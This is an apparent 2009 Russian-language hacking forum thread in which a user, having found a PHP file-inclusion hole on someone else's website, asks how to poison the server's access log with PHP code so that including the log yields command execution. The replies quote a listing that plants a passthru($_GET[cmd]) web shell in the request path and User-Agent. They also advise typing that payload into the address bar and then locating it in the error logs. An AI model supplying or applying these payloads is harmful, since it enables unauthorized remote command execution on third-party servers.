Как засунуть шелл-код в логи сервера
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Как засунуть шелл-код в логи сервера - 2009-03-16 17:41:43.340000
|
|
|
InFlame
Сообщений: 15
Оценки: 0
Присоединился: 2008-10-22 17:05:40.363333
|
Нашёл на одном сайте уязвимость php-including. Теперь возник вопрос: как надо сформировать http-запрос чтобы в логи сервера (/etc/httpd/access_log) занести мой php-код? Для того, чтобы в дальнейшем этот лог проинклудить.
|
|
|
RE: Как засунуть шелл-код в логи сервера - 2009-03-16 22:55:35.120000
|
|
|
Romeo Ordos
Сообщений: 229
Оценки: 0
Присоединился: 2006-10-13 14:50:17.960000
|
Кури вот это: http://forum.web-hack.ru/index.php?showtopic=33063
|
|
|
RE: Как засунуть шелл-код в логи сервера - 2009-03-17 17:02:43.383333
|
|
|
InFlame
Сообщений: 15
Оценки: 0
Присоединился: 2008-10-22 17:05:40.363333
|
Приведу цитату из журнала IT-спец: quote:
Тем не менее, даже в этой ситуации остается возможность инжектировать собственный PHP-код в журнал регистрации событий. Для этого нужно составить HTTP-GET-запрос, содержащий в себе PHP-код, который необходимо выполнить. Например: ЛИСТИНГ $CODE ='<?php ob_clean();echo START;$_GET[cmd]=striplashes($_GET[cmd]);passthru($_GET[cmd]);echo START;die;?>'; $content.="GET /path/".$CODE." HTTP/1.1/n"; $content.="User-Agent: ".$CODE."/n"; $content.="Host: ".$host."/n"; $content.="Connection: close/n/n"; Можете кто разъяснить, как это сделать? Куда этот код вставлять?
|
|
|
RE: Как засунуть шелл-код в логи сервера - 2009-03-17 17:23:19.200000
|
|
|
Romeo Ordos
Сообщений: 229
Оценки: 0
Присоединился: 2006-10-13 14:50:17.960000
|
Могу привести только один пример, которым пользовался сам. Есть такой замечательный кроссплатформенный наборчик инструментов netwox(netwag - графический интерфейс). В нем есть и тулза запросов к http серву, и очень хорошая документация с примерами к ней. Понимаю что это не самый простой вариант, но проще просто не знаю. Попробуй этот, может понравится.
|
|
|
RE: Как засунуть шелл-код в логи сервера - 2009-03-17 18:29:02.590000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
блин, да просто в адресной строке набираешь <?passthru($_GET[cmd]);?> а потом ищешь в логах ошибок
|
|
|
RE: Как засунуть шелл-код в логи сервера - 2009-03-18 09:03:17.206666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
+1
|
|
|
RE: Как засунуть шелл-код в логи сервера - 2009-03-18 18:29:48.746666
|
|
|
InFlame
Сообщений: 15
Оценки: 0
Присоединился: 2008-10-22 17:05:40.363333
|
http://target_site/<sсriрt language=php>phpinfo();</sсriрt> А таким образом сработает?
|
|
|
|
|